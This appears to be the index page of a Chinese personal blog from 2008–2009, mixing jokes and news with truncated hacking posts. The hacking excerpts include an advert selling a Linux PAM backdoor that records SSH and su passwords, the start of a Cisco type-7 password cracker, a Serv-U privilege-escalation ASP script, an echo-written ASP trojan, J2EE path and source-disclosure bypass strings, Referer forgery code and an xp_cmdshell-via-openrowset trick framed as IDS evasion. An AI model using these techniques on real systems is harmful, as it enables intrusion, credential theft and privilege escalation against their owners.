小比喻

烟花剑客 — Mon, 05 Jan 2009 12:11:00 GMT

猪通过勤劳致富有5元钱存在老鼠开的钱庄里。
猪打算拿这5元钱建一个小窝，大盖要花2元卖地，花3元搭窝。
王八是搞工程的，他想在猪身上挣更多的钱，于是找来当投资顾问的狐狸想办法，
狐狸说：这好办。于是找来管地盘的狼，开钱庄的老鼠一起来商议，结果王八从老鼠那里借来200元，用100元买了狼的地，花了3元把猪窝盖好，花了50元给了狐狸咨询服务费，
猪没有地，只好求王八把窝卖给它，王八要价500元，老猪说只有5元买不起，
这时候狐狸说服猪去向老鼠借钱，老鼠答应借500给猪，前提是要他连本带利还600元，可以分10年还清，
并且产权证拿来抵押。结果成交。猪到最后花了600元买来了猪窝，比他原来的计划高了110倍，
猪努力了十年去挣钱还贷。在这场交易里面，狼，老鼠，狐狸还有王八都挣了钱。
以后他们就如法炮制。更多的猪去贷款买房子了，这时候，当商人的驴看到有机可乘，到老鼠那里贷了好多好

番茄花园

烟花剑客 — Mon, 20 Oct 2008 10:19:00 GMT

淘宝最搞笑的评价

烟花剑客 — Tue, 02 Sep 2008 00:02:00 GMT

清脂减肥胶囊400mg*60粒
　　差评 [详情] 骗人，我拍的是一瓶。他却发一颗，那有吃1颗就减肥的，顺属欺诈2007.04.03 19:50
　　解释：
　　哦对不起，到昨天我才知道，我用的这个快

Multiple Vulnerabilities in AWStats Totals

烟花剑客 — Mon, 01 Sep 2008 01:25:00 GMT

AWStats Totals is "a simple php script to view the AWStats totals (Unique visitors, N

cisco password7方式的密码破解程序

烟花剑客 — Sun, 10 Aug 2008 00:36:00 GMT

/*
* * descambles cisco IOS type-7 passwords
* * found somewhere on the internet, slightly modified, anonymous@segfault.net
* *
* * gcc -Wall -o ciscocrack ciscocrack.c
* * ./ciscocrack 01178E05590909022A
* *
* */

#include <stdio.h>
#include <ctype.h>

char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
&nbs

全力关注bct开张中

烟花剑客 — Fri, 01 Aug 2008 17:05:00 GMT

期待最近bct重新开张

卡巴斯基网站被黑客攻破

烟花剑客 — Wed, 23 Jul 2008 17:56:00 GMT

牛人无数，sql无处不在啊！

北京时间7月22日消息，据国外媒体报道，俄罗斯信息安全厂商卡巴斯基实验室的马拉西亚网站周六被黑客攻破，相关的一个网络购物站点也受到影响。

　　网络安全组织Zone-H记录了这次攻击。
　　
　　记录显示，攻击者昵称为“m0sted”，攻击采用了“SQL注入”的方式。卡巴斯基随后关闭了该网站，该网站采用的是微软的IIS网络服务器。随后该网站不再面向所有用户开放，在接入前要求输入用户名和密码。

　　Zone-H同时公布了卡巴斯基该网站被攻破之后的截图。卡巴斯基尚未对这一事件发表评论，不过Zone-H表示，由于此次的攻击仅仅是以破坏为目的，因此未来还有可能出现更严重的安全风险。

　　卡巴斯基在该网站上提供评估版的安全软件下载，因此攻击者有可能以卡巴斯基的名义在该网站上发布恶意软件，这将对用户造成巨大威胁。

linux pam后门

烟花剑客 — Mon, 23 Jun 2008 21:45:00 GMT

废话不多说了,直接把动画txt写上,要的联系,货真价实的.联系qq:909473606

1.安装
编译好后，cp过去文件即可
有的发行版本，会自己做自己的发行版so，所以一般来说，我们都先在自己机器上编译好后门传上去
linux一般来说发行版比较多，所以我们在安装后门之前，最好在本地搭建个类似的环境实验，这样不容易丢鸡

我现在要安装后门的机器是fc4 具体内核没啥限制应用层后门就这点好，呵呵

安装
我已经编译好了

安装完毕，那个so穿上去就行了
这是我们的后门

注意吧pam_unix.so文件的属性改的和别的so属性一样。我这里本来就是一样的，我就不改了。

OK，安装完毕

现在看看他有什么功能

1.记录密码
这个后门可以记录所有登录sshd的用户密码，以及su的密码，默认，没开启记录功能。开启方法如下

我们开启

touch

天才学生

烟花剑客 — Fri, 02 May 2008 21:26:00 GMT

1.某次考试考语文，我的同桌在默词的时候突然灵感来了~前句：问君能有几多愁，要求补后句，他补了句：恰似一道红叉卷上留（原句：恰似一江春水向东流）。老师毫不客气得在卷上打了个X。他还沾沾自喜说：“原来我的灵感好灵的！”

2.也是语文考试默词，题目是：玉不琢，不成器。结果我们班一强人答：朋友妻，不客气，第二天家长就被叫到学校了。

3.又是语文考试，题目：长江后浪推前浪；某人答：一代更比一代浪。结果自然是家长又见校长。

4.高中的时候考试有道题是这样的：请写出鲁迅先生的作品《藤野先生》中藤野先生的全名。其答案如下：藤野菜菜子，藤野英二狼，（当时正好有放棒球英豪这个动画片）藤野武大郎，藤野花道，藤野五十六，藤野内丰，藤野隆史等等等等，比较绝的有：藤野小绵羊，气的老师在广播里骂我们无知。

5.一题曰“清水出芙蓉”，有人居然答到“乱世出英雄”，或答“山村出美女”，或答“深海出蛟龙”&hel

ASP,PHP与.NET伪造HTTP-REFERER方法及防止伪造REFERER

烟花剑客 — Fri, 25 Apr 2008 17:52:00 GMT

HTTP-REFERER这个变量已经越来越不可靠了，完全就是可以伪造出来的东东。

以下是伪造方法：

ASP/Visual Basic代码
dim http
set http=server.createobject("MSXML2.XMLHTTP") '//MSXML2.serverXMLHTTP也可以
Http.open "GET",url,false
Http.setRequestHeader "Referer","http://www.dc9.cn/"
Http.send()

PHP(前提是装了curl):

PHP代码
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "

Do All in Cmd Shell

烟花剑客 — Sun, 16 Mar 2008 05:23:00 GMT

Cmd Shell(命令行交互)是黑客永恒的话题，它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。

文件传输
对于溢出漏洞获得的cmd shell，最大的问题就是如何上传文件。由于蠕虫病毒流行，连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护，通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法，介于其已被大家熟知，本文就不介绍了。还有三种大家熟悉的办法，作为总结我再提一下：

1，用Echo命令写ASP木马。
前提当然是目标主机上已经安装了IIS。
一般的ASP木马"体积"较大，不适合直接用echo命令写入文件，这里我提供一个小巧的。
直接给出echo版：

@echo ^ >up.asp

注意，只有一行，中间没有回车符。
生成的up.asp不能用浏览器访问，只

J2ee web渗透

烟花剑客 — Sun, 16 Mar 2008 02:15:00 GMT

J2EE的WEB，都有一个WEB-INF的目录，这个目录下有所有的WEB配置文件，数据库配置文件和java二进制文件class文件。有很多站因为配置错误或者是默认配置，导致WEB-INF目录可浏览。通常一些J2EE WEB平台还有些通用的限制绕过漏洞

/WEB-INF../ /WEB-INF..%5C

J2EE的程序访问是通过配置文件里的路径设定实现的，"/xxx.do",并不代表目录下有xxx.do这个文件。

JSP的注射，现在已经有些工具可以实现，手工就没必要介绍了。但jsp有一些通用的源码泄露漏洞（一些流行的JSP WEB平台现在已经没这些漏洞了，低版本的还是有。如果看到是些不常见的JSP服务器，可以试一下）

.jsP .Jsp .jSp .JSP .jsp%2e .jsp%20 .jsp%80 .jsp%81.....jsp%89

关于HTTP访问和SSL访问差异，在有些情况下，WWW和SSL对WEB的访问，采取的是不同的配置。比如WEB

好个艳照门

烟花剑客 — Mon, 25 Feb 2008 03:35:00 GMT

忽然发现1个多月前替代就给我几张此照片，我还笑他是ps的，这傻！

躲避IDS

烟花剑客 — Wed, 16 Jan 2008 22:58:00 GMT

1．关于openrowset和opendatasource

　　可能这个技巧早有人已经会了，就是利用openrowset发送本地命令。通常我们的用法是（包括MSDN的列子）如下：
select * from openrowset('sqloledb','myserver';'sa';'','select * from table')

　　可见（即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问，它必须跟在select后面，也就是说需要返回一个recordset 。

　　那么我们能不能利用它调用xp_cmdshell呢？答案是肯定的！
select * from openrowset('sqloledb','server';'sa';'','set fmtonly off exec master.dbo.xp_cmdshel l ''dir c:\''')
必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置，这样xp_cmdshell返回的o

SU6.x提权脚本

烟花剑客 — Tue, 15 Jan 2008 10:03:00 GMT

Serv-U 6.X 提权脚本
使用方法：如果是6.4以下的保持默认即可，只要按你的需要修改执行的命令即可！如果为6.4请在"服务器端口"里填21，然后再在"服务器IP"中填写服务器的真实IP。
复制内容到剪贴板代码:
<%@ LANGUAGE = VBScript %>
<%
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(reque

既然已经失去了进入天堂寻觅幸福的资格..那么就让我沉沦地狱吧!

小比喻